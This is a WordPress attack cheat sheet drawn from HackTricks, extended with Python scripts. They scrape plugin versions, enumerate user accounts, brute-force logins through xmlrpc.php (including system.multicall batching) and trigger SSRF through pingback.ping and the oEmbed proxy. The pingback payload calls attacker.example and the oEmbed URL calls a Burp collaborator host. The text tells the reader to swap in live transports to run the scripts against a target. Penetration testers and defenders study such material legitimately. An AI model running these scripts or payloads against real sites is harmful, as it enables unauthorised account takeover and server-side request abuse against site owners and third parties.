Preface
The WordPress notes below are taken mainly from HackTricks.
Basic information
Theme files can be found in /wp-content/themes/
For example: with the theme twentytwelve you can access the 404.php file at /wp-content/themes/twentytwelve/404.php
Another useful URL to try: /wp-content/themes/default/404.php
wp-config.php holds the database credentials (DB_USER / DB_PASSWORD), which are frequently a root or otherwise over-privileged database account.
Default login paths to check: /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/
Main files
index.php, license.txt (license.txt reveals the installed WordPress version)
wp-activate.php
is used for the email activation process when setting up a new WordPress site.
Login folders:
/wp-admin/login.php
/wp-admin/wp-login.php
/login.php
/wp-login.php
xmlrpc.php
is a file that implements a WordPress feature enabling data to be transmitted with HTTP as the transport mechanism and XML as the encoding mechanism. Note that errors are reported as XML-RPC faults (faultCode/faultString) inside a normal HTTP 200 response, not through HTTP status codes. This type of communication has largely been superseded by the WordPress REST API, but xmlrpc.php remains present and enabled by default.
The wp-content
folder is the main directory where plugins and themes are stored.
wp-content/uploads/
Is the directory where any files uploaded to the platform are stored.
wp-includes/
This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
The wp-config.php
file contains the information WordPress needs to connect to the database, such as the database name, database host, username and password, the authentication keys and salts, and the database table prefix. The same file can enable debug mode (WP_DEBUG), which can be useful in troubleshooting and can leak paths and errors if left on in production.
Passive enumeration
Get Plugins
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Get Themes
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Extract versions in general
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '\?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
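The three pipelines above each scrape one kind of reference out of the page HTML. As an added example (not code from the original page or from HackTricks), the Python script below does the same extraction in one pass and groups the ?ver= values by plugin, theme and wp-includes asset; it runs offline on a constructed sample of WordPress front-page HTML, and the hostname and component names in that sample are made up.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed sample of the HTML a WordPress front page emits (hostname and
# component names are made up; this is not captured from a real site).
SAMPLE_HTML = """
<meta name="generator" content="WordPress 6.1.1" />
<link rel='stylesheet' id='contact-form-7-css' href='https://blog.example.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.2' media='all' />
<script src="https://blog.example.com/wp-content/plugins/woocommerce/assets/js/frontend/cart.min.js?ver=7.1.0"></script>
<link rel='stylesheet' id='twentytwelve-style-css' href='https://blog.example.com/wp-content/themes/twentytwelve/style.css?ver=20190507' />
<script src='https://blog.example.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'></script>
<a href="https://blog.example.com/about/">About</a>
"""

# Same idea as the sed/awk pipeline: pull every href= / src= value, then sort
# each URL into the WordPress directory it points at.
URL_ATTR = re.compile(r"""(?:href|src)=["']([^"']+)["']""", re.IGNORECASE)
PLUGIN = re.compile(r"/wp-content/plugins/([^/?#]+)")
THEME = re.compile(r"/wp-content/themes/([^/?#]+)")
INCLUDES = re.compile(r"/wp-includes/([^?#]+)")
GENERATOR = re.compile(r"""name=["']generator["']\s+content=["']WordPress ([\d.]+)["']""", re.IGNORECASE)


def asset_urls(html):
    """All href=/src= targets in the page, in document order."""
    return URL_ATTR.findall(html)


def versions_of(url):
    """The ?ver= values on an asset URL (usually, but not always, the component's version)."""
    return set(parse_qs(urlparse(url).query).get("ver", []))


def components(html):
    """Group asset URLs by plugin slug, theme slug or wp-includes path.

    Returns {"plugins": {slug: {ver, ...}}, "themes": {...}, "includes": {path: {ver, ...}}}.
    """
    out = {"plugins": {}, "themes": {}, "includes": {}}
    for url in asset_urls(html):
        for kind, rx in (("plugins", PLUGIN), ("themes", THEME), ("includes", INCLUDES)):
            m = rx.search(url)
            if m:
                out[kind].setdefault(m.group(1), set()).update(versions_of(url))
                break  # a URL belongs to exactly one of these directories
    return out


def core_version(html):
    """WordPress core version from the generator meta tag, or None if the site strips it."""
    m = GENERATOR.search(html)
    return m.group(1) if m else None


if __name__ == "__main__":
    # To run this against a target, replace SAMPLE_HTML with the body of a GET
    # to the site's front page.
    print("core:", core_version(SAMPLE_HTML))
    for kind, items in components(SAMPLE_HTML).items():
        for name, vers in sorted(items.items()):
            print(f"{kind:9} {name:32} {','.join(sorted(vers)) or '-'}")
```

The ?ver= value on a plugin asset is whatever the plugin passed to wp_enqueue_script/wp_enqueue_style; most plugins use their own version, but some use the core version or a timestamp, so confirm a suspected version against the plugin's readme.txt under /wp-content/plugins/<slug>/ before trusting it.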
Active enumeration
Users
curl -s -I -X GET http://blog.example.com/?author=1
A 301 redirect to /author/<username>/ in the Location header leaks the username; iterate author=2,3,... for the other accounts.
curl http://blog.example.com/wp-json/wp/v2/users
The REST endpoint lists users who have published posts (id, name, slug); hardened sites may disable it or answer with rest_user_cannot_view.
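The two requests above complement each other: the REST endpoint only lists users with published posts, while the author redirect leaks every account ID that exists. As an added example (not code from the original page or HackTricks), the script below combines both; the hostname, user names and responses of FAKE_SITE are constructed so it runs offline, and live_fetch is a hypothetical drop-in transport for a real target.

```python
import json
import re
from urllib.parse import urlparse

AUTHOR_PATH = re.compile(r"^/author/([^/]+)/?$")


def author_from_location(location):
    """Username slug from the redirect WordPress issues for /?author=N
    (e.g. Location: https://blog.example.com/author/admin/ -> "admin")."""
    m = AUTHOR_PATH.match(urlparse(location).path)
    return m.group(1) if m else None


def users_from_rest(body):
    """Parse /wp-json/wp/v2/users into {id: slug}; a non-list body such as
    {"code": "rest_user_cannot_view", ...} yields nothing."""
    data = json.loads(body)
    return {u["id"]: u["slug"] for u in data} if isinstance(data, list) else {}


def enumerate_users(fetch, base, max_author_id=10):
    """fetch(url) must return (status, headers, body) WITHOUT following
    redirects: the username lives in the 301 Location header."""
    found = {}
    status, _, body = fetch(f"{base}/wp-json/wp/v2/users")
    if status == 200:
        found.update(users_from_rest(body))
    for i in range(1, max_author_id + 1):
        status, headers, _ = fetch(f"{base}/?author={i}")
        if status in (301, 302):
            slug = author_from_location(headers.get("Location", ""))
            if slug:
                found[i] = slug
    return found


# Constructed stand-in for a target so the script runs offline (hostname and
# users are made up). User 2 never published a post, so the REST API omits
# it, but the author redirect still leaks the name.
FAKE_SITE = {
    "/wp-json/wp/v2/users": (200, {}, json.dumps([
        {"id": 1, "name": "Site Admin", "slug": "admin"},
        {"id": 3, "name": "Ed", "slug": "editor"},
    ])),
    "/?author=1": (301, {"Location": "https://blog.example.com/author/admin/"}, ""),
    "/?author=2": (301, {"Location": "https://blog.example.com/author/bob/"}, ""),
    "/?author=3": (301, {"Location": "https://blog.example.com/author/editor/"}, ""),
}


def fake_fetch(url):
    path = url[len("https://blog.example.com"):]
    return FAKE_SITE.get(path, (404, {}, ""))


def live_fetch(url):
    """Hypothetical real transport (not used offline): urllib with redirects disabled."""
    import urllib.error
    import urllib.request

    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None  # do not follow; let the 3xx surface as HTTPError

    opener = urllib.request.build_opener(NoRedirect)
    try:
        with opener.open(url, timeout=10) as r:
            return r.status, dict(r.headers), r.read().decode(errors="replace")
    except urllib.error.HTTPError as e:  # 3xx and 4xx both arrive here
        return e.code, dict(e.headers), e.read().decode(errors="replace")


if __name__ == "__main__":
    print(enumerate_users(fake_fetch, "https://blog.example.com", max_author_id=5))
```

Swap fake_fetch for live_fetch (or a requests.get with allow_redirects=False) to run it against a target; the ID-to-slug map it returns is the input for the XML-RPC credential checks in the next section.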
XML-RPC
If xmlrpc.php
is enabled you can brute-force credentials through it, or use pingback.ping to make the server issue HTTP requests to other hosts (SSRF, or DoS against a third party). Both can be scripted.
To check whether it is enabled, POST the following requests to /xmlrpc.php:
List the available methods (a 200 response listing wp.* and pingback.ping methods means the interface is enabled):
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>

Credential check with wp.getUsersBlogs (a fault 403 "Incorrect username or password." means the attempt was processed; a list of blogs means the credentials are valid):
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

Pingback (the server fetches the first URL to verify it links to the second, which must be a real post URL on the target):
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER>:<port></string></value>
</param><param><value><string>http://<SOME VALID POST URL ON THE SITE></string>
</value></param></params>
</methodCall>
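The three requests above are one procedure: confirm the interface, test credentials, then abuse pingback. As an added example (not code from the original page or HackTricks), the script below builds all three with the standard library's xmlrpc.client, classifies the responses (including the fault case, which arrives with HTTP 200), and goes one step beyond the page by batching attempts through system.multicall. The response bodies, hostnames and credentials it contains are constructed, not captured traffic; post_xmlrpc is the only part that talks to a network.

```python
import urllib.request
import xmlrpc.client

# --- request builders: the same three calls as in the text, as well-formed XML ---

def list_methods_request():
    return xmlrpc.client.dumps((), methodname="system.listMethods")


def login_request(user, password):
    """wp.getUsersBlogs: a valid credential pair returns the user's blogs."""
    return xmlrpc.client.dumps((user, password), methodname="wp.getUsersBlogs")


def pingback_request(source, target):
    """pingback.ping: the server fetches `source` to check that it links to `target`."""
    return xmlrpc.client.dumps((source, target), methodname="pingback.ping")


def multicall_login_request(user, passwords):
    """Pack many wp.getUsersBlogs attempts into ONE POST via system.multicall."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [user, p]} for p in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


# --- response handling ---

def parse_response(body):
    """(value, None) for a normal response, (None, faultString) for a fault.
    Faults come back inside an HTTP 200, so the status code tells you nothing."""
    try:
        (value,), _ = xmlrpc.client.loads(body)
        return value, None
    except xmlrpc.client.Fault as f:
        return None, f.faultString


def enabled_methods(list_methods_body):
    methods, _ = parse_response(list_methods_body)
    return set(methods or [])


def login_ok(body):
    """wp.getUsersBlogs returned a blog list (no fault): credentials are valid."""
    value, fault = parse_response(body)
    return fault is None and isinstance(value, list)


def multicall_hits(body, passwords):
    """Passwords whose attempt inside a system.multicall did not fault.
    Each element is either a {faultCode, faultString} struct or a one-element list."""
    results, _ = parse_response(body)
    return [pw for pw, r in zip(passwords, results or [])
            if not (isinstance(r, dict) and "faultCode" in r)]


def post_xmlrpc(url, body):
    """Real transport: POST the XML to https://<target>/xmlrpc.php and return the body."""
    req = urllib.request.Request(url, data=body.encode(), headers={"Content-Type": "text/xml"})
    with urllib.request.urlopen(req, timeout=15) as r:
        return r.read().decode()


# --- constructed responses in the shape WordPress sends (not captured traffic) ---
LIST_RESPONSE = xmlrpc.client.dumps(
    (["system.listMethods", "system.multicall", "wp.getUsersBlogs", "pingback.ping"],),
    methodresponse=True)
FAULT_RESPONSE = xmlrpc.client.dumps(
    xmlrpc.client.Fault(403, "Incorrect username or password."), methodresponse=True)
BLOGS = [{"blogid": "1", "blogName": "Example", "url": "https://blog.example.com/", "isAdmin": True}]
OK_RESPONSE = xmlrpc.client.dumps((BLOGS,), methodresponse=True)
MULTICALL_RESPONSE = xmlrpc.client.dumps(
    ([{"faultCode": 403, "faultString": "Incorrect username or password."}, [BLOGS]],),
    methodresponse=True)

if __name__ == "__main__":
    print("methods:", sorted(enabled_methods(LIST_RESPONSE)))
    print("single try valid:", login_ok(FAULT_RESPONSE), login_ok(OK_RESPONSE))
    print("multicall hits:", multicall_hits(MULTICALL_RESPONSE, ["wrong", "right"]))
    print(pingback_request("http://attacker.example:8080/", "https://blog.example.com/?p=1"))
```

Two caveats for real targets. Since WordPress 4.4 a multicall stops authenticating after the first failed login and returns a fault for every remaining call, so batching no longer amplifies a brute force on a current install; multicall_hits handles that because those results are fault structs too. For pingback, a fault saying the source URL does not link to the target still proves the server fetched your URL, which is all the SSRF check needs.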
/wp-json/oembed/1.0/proxy - SSRF
Try to access https://wordpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net
and the WordPress site may make a request to your listener. Caveat: this route requires an authenticated user with the edit_posts capability (an unauthenticated request gets a 401 rest_forbidden), so test it with a logged-in session plus a valid REST nonce (X-WP-Nonce) or an application password.